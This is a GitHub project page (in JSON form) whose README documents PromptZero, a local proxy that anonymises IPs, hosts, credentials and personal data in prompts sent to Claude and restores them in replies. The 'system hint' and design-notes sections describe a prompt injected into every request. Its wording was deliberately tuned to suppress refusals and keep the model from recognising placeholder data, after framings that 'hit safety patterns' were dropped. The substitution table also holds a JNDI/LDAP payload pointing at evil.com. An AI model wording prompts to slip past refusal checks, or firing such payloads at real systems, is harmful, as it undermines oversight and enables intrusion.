[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-80786":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":15,"stars7d":16,"stars30d":17,"stars90d":15,"forks30d":15,"starsTrendScore":13,"compositeScore":18,"rankGlobal":10,"rankLanguage":10,"license":10,"archived":19,"fork":19,"defaultBranch":20,"hasWiki":21,"hasPages":19,"topics":22,"createdAt":10,"pushedAt":10,"updatedAt":35,"readmeContent":36,"aiSummary":37,"trendingCount":15,"starSnapshotCount":15,"syncStatus":38,"lastSyncTime":39,"discoverSource":40},80786,"promptzero","openbashok\u002Fpromptzero","openbashok","Zero trace. Full answer. — Transparent Claude API proxy that anonymizes PII and sensitive data before it leaves your environment. From pentesters, to pentesters.","https:\u002F\u002Fopenbash.com",null,"Python",56,3,39,0,14,17,47.51,false,"main",true,[23,24,25,26,27,28,29,30,31,32,33,34],"anonymization","claude","data-privacy","infosec","llm","openai","pentesting","pii","privacy","proxy","redteam","security","2026-06-11 04:07:14","```\n██████╗ ██████╗  ██████╗ ███╗   ███╗██████╗ ████████╗    ███████╗███████╗██████╗  ██████╗\n██╔══██╗██╔══██╗██╔═══██╗████╗ ████║██╔══██╗╚══██╔══╝    ╚══███╔╝██╔════╝██╔══██╗██╔═══██╗\n██████╔╝██████╔╝██║   ██║██╔████╔██║██████╔╝   ██║          ███╔╝ █████╗  ██████╔╝██║   ██║\n██╔═══╝ ██╔══██╗██║   ██║██║╚██╔╝██║██╔═══╝    ██║         ███╔╝  ██╔══╝  ██╔══██╗██║   ██║\n██║     ██║  ██║╚██████╔╝██║ ╚═╝ ██║██║        ██║        ███████╗███████╗██║  ██║╚██████╔╝\n╚═╝     ╚═╝  ╚═╝ ╚═════╝ ╚═╝     ╚═╝╚═╝        ╚═╝        ╚══════╝╚══════╝╚═╝  ╚═╝ ╚═════╝\n```\n\n\u003Cdiv align=\"center\">\n\n**Zero Trust architecture for LLM prompts.**\n*Zero trace. Full answer.*\n\n[![Version](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fversion-2.5.0-blue.svg)](https:\u002F\u002Fgithub.com\u002Fopenbashok\u002Fpromptzero)\n[![Python](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fpython-3.10%2B-blue.svg)](https:\u002F\u002Fpython.org)\n[![License](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Flicense-MIT-green.svg)](LICENSE)\n[![OpenBash](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fby-OpenBash.com-red.svg)](https:\u002F\u002Fopenbash.com)\n[![From pentesters](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Ffrom%20pentesters-to%20pentesters-orange.svg)](https:\u002F\u002Fopenbash.com)\n\n\u003C\u002Fdiv>\n\n---\n\n> **PromptZero** applies Zero Trust principles to LLM interactions. A local, transparent\n> proxy that detects and replaces sensitive data — identities, infrastructure, secrets,\n> client material — in your prompts **before** they leave your environment, and restores\n> the real values in the response. Never trust the API. Always verify what crosses the\n> boundary. Your data stays home.\n\n---\n\n## The Problem\n\nYou use AI to analyze logs, write pentest reports, review code, summarize contracts.\nEvery prompt you send contains real IPs, hostnames, names, credentials, client\nidentifiers, payloads — and every byte of that crosses a boundary you do not control:\n\n```\nYou type:                          Claude receives:\n─────────────────────────────      ─────────────────────────────\n\"Analyze traffic from              \"Analyze traffic from\n 192.168.1.45 targeting             192.168.1.45 targeting\n db.prod.company.com                db.prod.company.com     ← your real infra\n Credentials: admin:P@ss1\"          Credentials: admin:P@ss1\"  ← your real creds\n```\n\nVendor contracts and Private-AI SaaS don't fix this — they just shift trust to\na different third party. PromptZero handles the boundary locally and lets you\nverify it end-to-end with the tools you already use (Burp, mitmproxy).\n\n---\n\n## How It Works\n\n```\n╔══════════════════════════════════════════════════════════════════════╗\n║                        YOUR ENVIRONMENT  (trusted)                   ║\n║                                                                      ║\n║  ┌─────────────┐     ┌──────────────────────────────┐               ║\n║  │  Your App   │────▶│         PromptZero            │               ║\n║  │  Claude CLI │     │       localhost:8000           │               ║\n║  │  SDK \u002F curl │◀────│                               │               ║\n║  └─────────────┘     │  ① Detect  sensitive spans   │               ║\n║                       │  ② Replace synthetic values  │               ║\n║                       │  ③ Forward clean prompt      │               ║\n║                       │  ④ Receive model response    │               ║\n║                       │  ⑤ Restore real values       │               ║\n║                       └──────────────┬───────────────┘               ║\n║                                      │                               ║\n║         ✗ Sensitive data NEVER       │  Only synthetic data          ║\n║           crosses this line          │  crosses this boundary        ║\n╚══════════════════════════════════════│══════════════════════════════╝\n                                       │   ← TRUST BOUNDARY\n                              ┌────────▼────────┐\n                              │   api.anthropic │     (untrusted —\n                              │      .com       │      verifiable\n                              │                 │      with Burp \u002F\n                              └─────────────────┘      mitmproxy)\n```\n\n### Before & After\n\n```\nYOUR PROMPT (real data)              WHAT CLAUDE SEES (synthetic)\n══════════════════════════           ════════════════════════════════\n192.168.1.45              ────▶      198.51.100.1          (RFC 5737)\n2001:db8:1234::5          ────▶      2001:db8::1           (RFC 3849)\ndb.prod.company.com       ────▶      alpha.example.com     (RFC 2606)\nadmin@company.com         ────▶      user001@example.com   (RFC 2606)\nJohn Smith                ────▶      Soren Brännström      (NLP)\nAcme Financial S.A.       ────▶      Nordhaven Holdings    (NLP)\n+54 11 4444-5555          ────▶      +1-555-000-0001\nDNI 28.456.123            ────▶      FAKE-ID-000001\npassword='S3cur3P@ss!'    ────▶      password='sk-faux-0001-xxxxxxxxxxxxxxxx'\nsk-ant-api03-xxxxx...     ────▶      FAKE_TOKEN_0001_xxxxxxxx\n${jndi:ldap:\u002F\u002Fevil.com\u002Fx} ────▶      ${jndi:ldap:\u002F\u002Fbravo.example.com\u002Fx}\n\n\nCLAUDE'S RESPONSE (synthetic)        YOU RECEIVE (real data restored)\n════════════════════════════         ═════════════════════════════════\n\"198.51.100.1 shows signs ────▶      \"192.168.1.45 shows signs\n of lateral movement to               of lateral movement to\n alpha.example.com\"                   db.prod.company.com\"\n```\n\n> All synthetic values come from **IANA-reserved documentation ranges** —\n> RFC 5737 (`198.51.100.0\u002F24`, `203.0.113.0\u002F24`), RFC 3849\n> (`2001:db8::\u002F32`) and RFC 2606 (`example.com`). The model treats them\n> as opaque non-existent targets, without the \"loopback \u002F internal-lab\"\n> semantics that earlier loopback-flavoured fakes (`127.0.0.x`,\n> `*.localhost`) carried — see [Design notes](#design-notes-why-example-com--system-hint) below.\n\n---\n\n## What Gets Protected\n\n| Data Type | Real → Synthetic | Detection |\n|---|---|---|\n| IPv4 address | `45.77.12.91` → `198.51.100.1` (RFC 5737) | Regex |\n| IPv6 address | `2001:abcd::1` → `2001:db8::1` (RFC 3849) | Regex |\n| Hostname \u002F FQDN | `vpn.corp.com` → `alpha.example.com` (RFC 2606) | Regex + NLP (URL) |\n| URL | `https:\u002F\u002Fapi.corp.com\u002Fv2` → `https:\u002F\u002Fbravo.example.com\u002Fv2` | Regex + NLP |\n| host:port | `db.internal:5432` → `charlie.example.com:5432` | Regex |\n| Email | `john@corp.com` → `user001@example.com` (RFC 2606) | Regex + NLP |\n| Credential value | `password='S3cur3P@ss!'`, `Authorization: Bearer …`, `\"secret\":\"…\"` → `sk-faux-0001-xxxxxxxxxxxxxxxx` | **Regex (key-aware)** |\n| Phone (US\u002FCA) | `+1-555-123-4567` → `+1-555-000-0001` | Regex + NLP |\n| Phone (LatAm + ES) | `+54 11 4444-5555`, `+56 9 1234 5678`, `+34 612 345 678`, `+52 55 1234 5678`, `+57 300 123 4567`, `+598 99 123 456` → `+1-555-000-0001` | **Regex (LatAm\u002FES)** |\n| Person name | `John Smith`, `María Fernández` | **NLP (spaCy en+es)** |\n| Organization | `Acme Corp S.A.`, `Nexabank Financial S.A.` | **NLP (spaCy en+es)** |\n| Argentina DNI | `DNI 28.456.123` → `DNI 11.111.001` | **Regex (AR)** |\n| Argentina CUIT\u002FCUIL | `20-12345678-9` → `20-11111001-1` | **Regex (AR)** |\n| Chile RUT | `12.345.678-K` → `11.111.001-1` | **Regex (CL)** |\n| Spain DNI\u002FNIE | `12345678A`, `X1234567A` → `X0000001A` | **Regex (ES) + NLP** |\n| Uruguay CI | `1.234.567-8` → `1.111.001-1` | **Regex (UY)** |\n| Colombia CC | `CC 1.234.567` → `CC 1.111.001` | **Regex (CO)** |\n| Mexico CURP | `AAAA000000HAAAAA00` → `FAKE000001HDFXXX11` | **Regex (MX)** |\n| Mexico RFC | `AAAA000000AAA` → `FAKE000001XX1` | **Regex (MX)** |\n| Passport | `AAB123456` → `XX0000001` | **NLP (Presidio)** |\n| SSN | `123-45-6789` → `000-00-0001` | Regex + NLP |\n| Credit card | `4111 1111 1111 1234` → `4111-1111-1111-0001` | Regex + NLP |\n| IBAN | `GB29NWBK60161331926819`, `AR1500011110000…` → `FAKEIBAN000…` | NLP |\n| API key \u002F Token | `sk-ant-api03-xxxxxx...` → `FAKE_TOKEN_0001_xxxxxxxx` | Regex |\n\n> **Pentesting-friendly substitutions:** all fakes live inside\n> IANA-reserved documentation ranges (RFC 5737 for IPv4, RFC 3849 for\n> IPv6, RFC 2606 for `example.com`). The model treats them as opaque\n> non-existent targets, **without** the \"loopback \u002F internal lab\"\n> semantics that earlier `127.0.0.x` \u002F `*.localhost` fakes carried —\n> which used to silently downgrade the severity of external-exposure\n> findings. See [Design notes](#design-notes-why-example-com--system-hint).\n\n---\n\n## Architecture\n\n```\npromptzero\u002F\n├── main.py          ← FastAPI proxy server (drop-in for api.anthropic.com)\n├── sanitizer.py     ← Detection engine: NLP (Presidio+spaCy) + Regex layers\n├── setup.sh         ← One-command setup\n├── requirements.txt\n├── .env.example\n└── examples\u002F\n    ├── poc\u002F                ← Proof-of-concept: 5 fictitious datasets + demo scripts (local + Claude E2E)\n    ├── document_summary\u002F   ← Summarize PDF\u002FDOCX\u002FTXT with PII protection\n    └── pentest_report\u002F     ← Generate full pentest reports from findings JSON\n```\n\n### Detection layers\n\n```\nText input\n    │\n    ├─▶ [ NLP Layer — Presidio + spaCy (en + es) ]\n    │     PERSON, ORGANIZATION, PHONE, EMAIL,\n    │     CREDIT_CARD, IBAN, SSN, PASSPORT,\n    │     NATIONAL_ID (ES_NIF, NRP), URL, IP_ADDRESS\n    │\n    ├─▶ [ Regex Layer — country-specific national IDs ]\n    │     AR: DNI, CUIT\u002FCUIL          CL: RUT\n    │     ES: DNI\u002FNIE                 UY: CI\n    │     CO: Cédula (CC)             MX: CURP, RFC\n    │     Phones: +34 +52 +54 +55 +56 +57 +598\n    │\n    ├─▶ [ Regex Layer — network & infra ]\n    │     IPv4, IPv6, hostnames, host:port,\n    │     long tokens\u002FAPI keys, URLs\n    │\n    └─▶ [ Merge & deduplicate by span ]\n          └─▶ Replace real → synthetic\n                └─▶ Store in session mapping table\n```\n\n### Session mapping\n\nEach conversation gets a **session-scoped bidirectional mapping table**.\nThe same real value always maps to the same synthetic value within a session —\nso your conversation stays coherent end-to-end.\n\n```\nSession: \"pentest-acmecorp-2026\"\n──────────────────────────────────────────────────\nReal value                   Synthetic value\n──────────────────────────────────────────────────\n192.168.1.45        ←──────▶  198.51.100.1\ndb.prod.acme.com    ←──────▶  alpha.example.com\nJohn Smith          ←──────▶  Soren Brännström\nadmin@acme.com      ←──────▶  user001@example.com\nS3cur3P@ss!         ←──────▶  sk-faux-0001-xxxxxxxxxxxxxxxx\n──────────────────────────────────────────────────\n           Stored locally. Never sent anywhere.\n```\n\n---\n\n## Quick Start\n\nTwo ways to run the proxy. Same behaviour either way — pick whichever\nfits your environment.\n\n### Option A — Docker (recommended)\n\nNo Python, no virtualenv, no model download dance. Models are baked\ninto the published image (linux\u002Famd64 + linux\u002Farm64). Pull and run:\n\n```bash\ndocker run -p 8000:8000 \\\n    -e ANTHROPIC_API_KEY=sk-ant-... \\\n    ghcr.io\u002Fopenbashok\u002Fpromptzero:latest\n# Listening on http:\u002F\u002Flocalhost:8000\n```\n\nCommon variants:\n\n```bash\n# Pass a full .env file (ANTHROPIC_API_KEY + UPSTREAM_PROXY + …)\ndocker run -p 8000:8000 --env-file .env ghcr.io\u002Fopenbashok\u002Fpromptzero\n\n# Route the upstream hop through Burp running on the host (macOS \u002F Windows)\ndocker run -p 8000:8000 --env-file .env \\\n    -e UPSTREAM_PROXY=http:\u002F\u002Fhost.docker.internal:8080 \\\n    -e UPSTREAM_VERIFY=false \\\n    ghcr.io\u002Fopenbashok\u002Fpromptzero\n```\n\nBuild it yourself if you prefer:\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fopenbashok\u002Fpromptzero && cd promptzero\ndocker build -t promptzero .                       # 'lg' models, ~1.5 GB\ndocker build --build-arg SPACY_SIZE=sm -t promptzero:slim .   # ~300 MB\n```\n\n### Option B — Native install\n\nUseful if you want to hack on the proxy itself or you prefer to keep\nthe venv on your host.\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fopenbashok\u002Fpromptzero\ncd promptzero\n\n.\u002Fsetup.sh                 # venv + deps + spaCy models en + es (~1 GB)\ncp .env.example .env       # add your ANTHROPIC_API_KEY\npython main.py             # listening on http:\u002F\u002Flocalhost:8000\n```\n\n`.\u002Fsetup.sh` downloads the `lg` spaCy models by default. Use\n`.\u002Fsetup.sh medium` (~40 MB) or `.\u002Fsetup.sh small` (~12 MB) for a\nlighter install, or `.\u002Fsetup.sh en-only` if you only process English.\n\n---\n\n## Usage\n\nPromptZero is a **drop-in replacement** for `https:\u002F\u002Fapi.anthropic.com`.\nOne line change. Everything else stays the same.\n\n### Python SDK\n\n```python\nimport anthropic\n\nclient = anthropic.Anthropic(\n    api_key=\"your-api-key\",\n    base_url=\"http:\u002F\u002Flocalhost:8000\",   # ← only change\n)\n\nmessage = client.messages.create(\n    model=\"claude-opus-4-6\",\n    max_tokens=1024,\n    messages=[{\n        \"role\": \"user\",\n        \"content\": \"Analyze traffic from 10.0.1.42 to db.prod.corp:5432. User: john@corp.com\"\n    }],\n    extra_headers={\"x-session-id\": \"my-session\"},  # keeps mapping consistent\n)\n\nprint(message.content[0].text)\n# → Real IPs and email are restored in the response\n```\n\n### curl\n\n```bash\ncurl http:\u002F\u002Flocalhost:8000\u002Fv1\u002Fmessages \\\n  -H \"x-api-key: $ANTHROPIC_API_KEY\" \\\n  -H \"x-session-id: my-session\" \\\n  -H \"anthropic-version: 2023-06-01\" \\\n  -H \"content-type: application\u002Fjson\" \\\n  -d '{\n    \"model\": \"claude-opus-4-6\",\n    \"max_tokens\": 1024,\n    \"messages\": [{\n      \"role\": \"user\",\n      \"content\": \"The payload hit 203.0.113.5:8443 — what does this CVE-2024-21762 exploit look like?\"\n    }]\n  }'\n```\n\n### Management endpoints\n\n```bash\n# Health check (also surfaces the active upstream \u002F hint config)\nGET    \u002Fhealth\n\n# Cumulative counters since startup (requests, bytes, sensitive spans by kind)\nGET    \u002Fstats\n\n# Inspect what PromptZero mapped in a session (debug)\nGET    \u002Fsessions\u002F{session_id}\u002Fmappings\n\n# Inspect the *sanitized request* and *desanitized response* recorded\n# for each call in a session — proof that no real PII reached upstream.\n# Requires DEBUG_AUDIT=1 at start time.\nGET    \u002Fsessions\u002F{session_id}\u002Faudit\n\n# Reset a session's mapping table (and audit log if any)\nDELETE \u002Fsessions\u002F{session_id}\n```\n\nThe proxy terminal prints **one colored trace line per request**, showing\nexactly what got sanitized — useful when running Claude Code (or any\nclient) alongside it so you can verify in real time which sensitive data was masked\non each turn:\n\n```\n[trace] POST \u002Fv1\u002Fmessages     session=poc-pent  +4 spans (total 4: 1 phone, 1 email, 1 ipv4, 1 url)  in= 197B out= 494B  200 2012ms\n[trace] POST \u002Fv1\u002Fmessages     session=poc-pent  +3 spans (total 7: 2 ipv4, 1 person, 1 hostname)  in= 185B out= 697B  200 1273ms\n[trace] GET   \u002Fv1\u002Fmodels           (passthrough, no sanitization)  200  367ms\n```\n\nFor cumulative metrics, hit `\u002Fstats`:\n\n```bash\nwatch -n 1 'curl -s localhost:8000\u002Fstats | jq'\n```\n\nExample payload:\n\n```json\n{\n  \"uptime_seconds\": 142.3,\n  \"active_sessions\": 2,\n  \"requests\": {\n    \"total\": 7,\n    \"messages\": 5,\n    \"count_tokens\": 1,\n    \"passthrough\": 1,\n    \"errors\": 0\n  },\n  \"bytes\": {\n    \"sanitized_in\":   12480,\n    \"desanitized_out\": 28350\n  },\n  \"pii_spans\": {\n    \"total_unique\": 47,\n    \"by_kind\": {\n      \"person\": 8, \"org\": 5, \"ipv4\": 14, \"hostname\": 9,\n      \"email\": 6, \"national_id_ar_dni\": 3, \"phone\": 2\n    }\n  }\n}\n```\n\n### Routing the Claude Code CLI through PromptZero\n\nThe proxy is a drop-in replacement for `api.anthropic.com`, so the Claude Code\nCLI works through it with a single env var:\n\n```bash\n# Start PromptZero (terminal 1)\npython main.py\n\n# Run Claude Code via the proxy (terminal 2)\nexport ANTHROPIC_BASE_URL=http:\u002F\u002Flocalhost:8000\nclaude\n\n# Every prompt typed in the CLI is now sanitized before reaching Claude,\n# and Claude's responses are desanitized before reaching your terminal.\n```\n\nWhat the proxy handles for the CLI:\n\n| Route | Behaviour |\n|---|---|\n| `POST \u002Fv1\u002Fmessages`             | Sanitized → forwarded. Response desanitized. Streaming OK. |\n| `POST \u002Fv1\u002Fmessages\u002Fcount_tokens`| Sanitized so token counts reflect the sanitized prompt.    |\n| Anything else under `\u002Fv1\u002F*`     | Forwarded unchanged (`models`, `organizations`, `files`, `batches`, …) |\n\nVerify Claude Code is going through the proxy:\n\n```bash\n# In a third terminal — watch active sessions grow as you use the CLI\nwatch -n 1 'curl -s http:\u002F\u002Flocalhost:8000\u002Fhealth'\n\n# Inspect what got mapped in the last session\ncurl -s http:\u002F\u002Flocalhost:8000\u002Fsessions\u002F\u003Cid>\u002Fmappings | jq\n```\n\n### Inspecting upstream traffic with Burp Suite (or mitmproxy)\n\nDon't take our word for it — route PromptZero's upstream connection\n(PromptZero → `api.anthropic.com`) through Burp and inspect every byte\nyourself. Two env vars in `.env`:\n\n```bash\n# Send PromptZero → api.anthropic.com traffic through Burp\nUPSTREAM_PROXY=http:\u002F\u002F127.0.0.1:8080\n\n# Burp does TLS interception with its own CA — either trust it\n# explicitly (recommended):\nUPSTREAM_CA_BUNDLE=\u002FUsers\u002Fyou\u002Fburp-ca.pem\n# …or skip verification for a quick demo (insecure):\nUPSTREAM_VERIFY=false\n```\n\nSteps:\n\n1. **Export Burp's CA cert as PEM**\n   `Burp → Proxy → Settings → Import \u002F export CA certificate → \"Certificate in PEM format\"`\n   Save it as `~\u002Fburp-ca.pem`.\n\n2. **Enable Burp's proxy listener** on `127.0.0.1:8080` (default).\n\n3. **Set the env vars in `.env`** (snippet above) and restart `python main.py`.\n\n4. **Confirm via \u002Fhealth** that the proxy picked up the config:\n   ```bash\n   curl -s http:\u002F\u002Flocalhost:8000\u002Fhealth | jq\n   # → \"upstream_proxy\": \"http:\u002F\u002F127.0.0.1:8080\"\n   #   \"upstream_verify\": \"\u002FUsers\u002Fyou\u002Fburp-ca.pem\"\n   ```\n\n5. **Run your client** as usual (`claude`, `python demo_claude.py`, `curl`…).\n\n6. **Inspect in Burp** — open the HTTP history. Every request to\n   `api.anthropic.com\u002Fv1\u002Fmessages` shows the **sanitized** body. Filter\n   the history for any real value from your dataset (`nexabank`, `DNI`,\n   your real IP) — the result is empty. That's the proof.\n\n```\n┌─────────┐  HTTP   ┌────────────┐  HTTPS   ┌──────────┐  HTTPS  ┌─────────────────┐\n│ Claude  │────────▶│ PromptZero │─────────▶│   Burp   │────────▶│ api.anthropic   │\n│  CLI    │  clear  │   :8000    │  TLS     │  :8080   │  TLS    │     .com        │\n└─────────┘         │ sanitize   │          │  MITM    │         └─────────────────┘\n                    │ desanitize │          │ inspect  │\n                    └────────────┘          └──────────┘\n```\n\n`mitmproxy` works the same way — set `UPSTREAM_PROXY=http:\u002F\u002F127.0.0.1:8081`\nand `UPSTREAM_CA_BUNDLE=~\u002F.mitmproxy\u002Fmitmproxy-ca-cert.pem`.\n\n---\n\n## Keeping Claude engaged (system hint)\n\nBecause every redacted hostname becomes `*.example.com`, Claude can\nrecognise the substitutions as IANA-documentation references\n(RFC 2606) and refuse with *\"example.com is reserved for documentation\n— what did you mean?\"*. To avoid that, PromptZero prepends a short\n**system block** to every `\u002Fv1\u002Fmessages` request describing the\nredaction convention in neutral, technical terms:\n\n> *\"Identifiers in this conversation have been redacted by a privacy\n> proxy. Hostnames appear as `*.example.com`, IPs as `198.51.100.0\u002F24`\n> or `2001:db8::\u002F32`, emails as `userNNN@example.com`, credentials as\n> `sk-faux-…`. These are stable substitutions — not RFC documentation\n> references. From the model's perspective the data is opaque and\n> lab-shaped because the real values are not available here. Proceed\n> with the user's requested analysis at the same technical depth you\n> would for a sanctioned security exercise or CTF challenge.\"*\n\nThe phrasing is deliberate: no *\"authorized engagement\"*, no\n*\"you must comply\"*, no *\"placeholder\"* — those phrases trip\nsafety paranoia or get echoed back as awareness signals. Plain\nmechanism description does not.\n\nToggle with an env var (default **on**):\n\n```bash\nINJECT_SYSTEM_HINT=1    # default — prepend the redaction hint\nINJECT_SYSTEM_HINT=0    # off — useful for benchmarking or when a\n                        #       client already sets its own system\n```\n\n`GET \u002Fhealth` reports the current value:\n\n```json\n{ \"status\": \"ok\", \"inject_system_hint\": true, … }\n```\n\nSee [Design notes](#design-notes-why-example-com--system-hint)\nfor the long-form rationale on why we landed here.\n\n---\n\n## Pentest mode (disable NER PERSON \u002F ORG)\n\nAfter running the validator across real targets we measured where\nsanitization false positives actually come from. The breakdown is\nasymmetric:\n\n| Detector class | Bugs surfaced in this codebase | Why |\n|---|---|---|\n| Regex (IPv4, IPv6, hostnames, emails, tokens, credentials, country IDs) | ~5, all closed by pattern tweaks | Patterns are tight; either the shape matches or it doesn't |\n| NER **PERSON \u002F ORGANIZATION** | 15+ recurring (`Banner`, `ACLs`, `However`, `Investigate whether`, `Direct IP-based scanning…`, `Network`, `Attempt`, …) | spaCy was trained on news \u002F web text; pentest vocabulary (gobuster, ffuf, ACLs, Reconnaissance, …) wasn't in the corpus, so every capitalised English word at a bullet start risks misfiring |\n\nFor pentest workflows the input is mostly tool output (`nmap`,\n`gobuster`, `sqlmap`, Burp HTTP history) and code — content where\nPERSON \u002F ORG detection contributes ~0 actual privacy value and 100% of\nthe false-positive noise. The proxy ships a switch to drop those two\nentity classes entirely:\n\n```bash\nDETECT_PERSON_ORG=1    # default — full NER pipeline\nDETECT_PERSON_ORG=0    # pentest mode — drop PERSON \u002F ORG, keep everything else\n```\n\nWhat stays intact when off: IPv4, IPv6, hostnames, URLs, host:port,\nemails, country-specific national IDs (AR\u002FCL\u002FES\u002FUY\u002FCO\u002FMX), credit\ncards, IBAN, SSN, phones, API tokens, key-aware credentials. What\ngoes away: detection of standalone person \u002F organization names in\nfree-form narrative.\n\n`GET \u002Fhealth` reports the current value:\n\n```json\n{ \"status\": \"ok\", \"detect_person_org\": false, … }\n```\n\nWhen to use which mode:\n\n- **`DETECT_PERSON_ORG=1`** (default) — incident reports, document\n  summaries, customer-support transcripts, anything written by\n  humans where you want auditor \u002F contact \u002F client names redacted.\n- **`DETECT_PERSON_ORG=0`** — driving Claude Code through the proxy\n  for active pentest engagements, log triage, code review on shell\n  output, automated tooling that produces structured technical text.\n\n---\n\n## Integration test suite\n\n`examples\u002Fpoc\u002Fintegration_test.py` drives real Claude calls through the\nproxy and asserts four invariants per scenario — useful as a regression\nrunner after any sanitizer change, and as a sanity probe before going\ninto a real engagement:\n\n| Check | What it asserts |\n|---|---|\n| **L** leak       | No expected real value appears in the upstream payload Anthropic received |\n| **N** ner-recall | Every expected real value is present in the session mapping table |\n| **R** round-trip | No fake value remains in the desanitized reply (every substitution was reversed) |\n| **A** awareness  | The model does not call out the data as test \u002F placeholder \u002F fictional |\n\nSix scenarios out of the box (single-turn pentest report, log triage,\ntransformation resistance, JSON payload, code review, plus a 3-turn\nconversation history scenario for re-sanitization across turns):\n\n```bash\n# Start the proxy with DEBUG_AUDIT=1 so the runner can read \u002Faudit\nDEBUG_AUDIT=1 python main.py\n\n# In a second terminal\npython examples\u002Fpoc\u002Fintegration_test.py \\\n    --proxy http:\u002F\u002F127.0.0.1:8000 \\\n    --model claude-haiku-4-5\n```\n\nOutput is per-scenario PASS\u002FFAIL plus a punch-list of any check that\nfailed — the suite caught four real bugs during its initial build\n(Presidio URL truncation, short password leak, IPv6 fake-pool\ncollision, hostname false-positives on Python identifiers) before any\nof them shipped.\n\n---\n\n## Examples\n\n### Proof of Concept\n\nThe fastest way to *see* PromptZero in action — five fictitious datasets (personal\ndata, full pentest engagement with HTTP req\u002Fres + payloads, injection catalog,\nincident response, support chat) and three demo scripts (local sanitizer,\nvisual HTML report, end-to-end against Claude).\n\n```bash\ncd examples\u002Fpoc\n\n# Standalone — no API call, prints original \u002F sanitized \u002F desanitized\n# + the full real↔fake mapping table.\npython demo_local.py\npython demo_local.py data\u002F01_personal_records.json\n\n# Visual HTML report — side-by-side original vs sanitized with each\n# sensitive span colour-coded, hover-to-link mappings, summary table.\npython demo_html.py --open\npython demo_html.py --with-claude --task triage \\\n    --dataset data\u002F04_incident_response.json --out ir.html --open\n\n# End-to-end against the real Claude API (proxy must be running)\npython demo_claude.py\npython demo_claude.py --dataset data\u002F04_incident_response.json --task triage\n```\n\nSee [`examples\u002Fpoc\u002FREADME.md`](examples\u002Fpoc\u002FREADME.md) for the full dataset\ncatalog and script options.\n\n### Document Summary\n\nSummarize any document (PDF, DOCX, TXT, log) with full PII protection.\n\n```bash\ncd examples\u002Fdocument_summary\npip install -r requirements.txt\n\npython summarize.py contract.pdf\npython summarize.py incident_report.docx --mode executive --lang es\npython summarize.py access.log --mode technical\n```\n\n### Pentest Report Generator\n\nGenerate professional pentest reports from a structured findings JSON.\nIPs, hostnames, client names, credentials, and payloads are all protected.\n\n```bash\ncd examples\u002Fpentest_report\npip install -r requirements.txt\n\n# Full technical report\npython report.py findings.json\n\n# Executive summary in Spanish\npython report.py findings.json --mode executive --lang es --out ejecutivo.md\n\n# Remediation checklist\npython report.py findings.json --mode remediation --out fixes.md\n\n# Protect short passwords the proxy might miss\npython report.py findings.json --protect \"P@ssw0rd1\" \"Summer2023!\"\n```\n\nSee [`examples\u002Fpentest_report\u002Fsample_findings.json`](examples\u002Fpentest_report\u002Fsample_findings.json)\nfor a complete example with 6 realistic findings (critical → low).\n\n---\n\n## Design notes — Why `example.com` + system hint?\n\nThis is the rationale behind the substitution choices, in case you\nwant to fork or tune the proxy for a different LLM family or risk\nposture. We iterated through three different fake-domain strategies\nand each had a different failure mode.\n\n**1. Loopback-flavoured fakes (early versions: `127.0.0.x` \u002F\n`*.localhost` \u002F `userNNN@fakecorp.local`).** Worked for round-trip\nbut silently changed Claude's reasoning: external-exposure findings\ngot framed as \"internal lab \u002F loopback service, lower criticality\".\nFor pentest reports this means the model **downgrades severity**\nwithout telling you. Dropped.\n\n**2. Plausible real-looking domains (e.g. `acme-corp.io`,\n`nexabank.com`).** Two failure modes:\n- The model recognises the brand from its training corpus and\n  applies real-world knowledge (\"Nexabank uses Spring Boot, so…\")\n  contaminating the analysis with hallucinated facts about a real\n  company.\n- Names like *Acme Corp*, *Globex*, *Initech*, *Umbrella Tech* are\n  exactly Claude's go-to placeholders when **inventing** fictional\n  examples in its own writing. The model emits them unsolicited;\n  the desanitizer then maps them back to whatever happened to live\n  in the session table (often an NLP false-positive like\n  `Credential → Bob Calloway`) and corrupts the user-visible\n  output.\n\n**3. IANA-reserved documentation ranges (current).** RFC 5737\n(`198.51.100.0\u002F24`, `203.0.113.0\u002F24`), RFC 3849\n(`2001:db8::\u002F32`), RFC 2606 (`example.com`). Claude has these in\nits training corpus **as placeholders**, so it doesn't pull\nreal-world facts about them and doesn't apply loopback or\ninternal-only semantics. The name pools (`Soren Brännström`,\n`Nordhaven Holdings`, …) are deliberately uncommon European-flavoured\ninventions that Claude does **not** emit spontaneously when writing\nnarrative examples.\n\nThe trade-off: with `*.example.com` the model occasionally\nrecognises the substitution and asks *\"example.com is reserved for\ndocumentation — what did you mean?\"*. That's where the\n**[system hint](#keeping-claude-engaged-system-hint)** comes in: a\nshort, neutral text block prepended to every request that explains\nthe redaction mechanism and instructs the model to operate at the\ndepth of a sanctioned security exercise. It defuses the recognition\nwithout sounding like a jailbreak — we tried framings with\n*\"authorized engagement\"*, *\"you must comply\"*, and *\"real\npentest\"*, all of which increased refusal rates because they hit\nsafety patterns directly. Naming the mechanism does not.\n\nIf your use case is **not** pentesting — say, generating training\ncontent where the lab framing actually helps — disable the hint\nwith `INJECT_SYSTEM_HINT=0`. The substitution itself remains\nidentical.\n\n---\n\n## About OpenBash\n\n**PromptZero** is a project by [OpenBash.com](https:\u002F\u002Fopenbash.com) —\na community built **from pentesters, to pentesters**.\n\nWe build open-source security tools that help the community work smarter,\nstay protected, and keep sensitive data where it belongs: at home.\n\nIf this tool helps you, share it. If you find a bug, open an issue.\nIf you improve it, send a PR.\n\n---\n\n## Contributing\n\n```bash\n# Fork → clone → branch\ngit checkout -b feature\u002Fmy-improvement\n\n# Make changes, test manually\npython main.py &\n# test your changes against localhost:8000\n\n# Submit PR to main\n```\n\nIdeas for contributions:\n- Additional language support (spaCy models for ES, PT, FR, DE)\n- Persistent session storage (SQLite \u002F Redis)\n- More examples (`log_analyzer`, `code_reviewer`, `nessus_parser`)\n- CLI wrapper (`promptzero \"your prompt here\"`)\n- Docker image\n\n---\n\n## License\n\nMIT — free to use, modify, distribute.\nAttribution 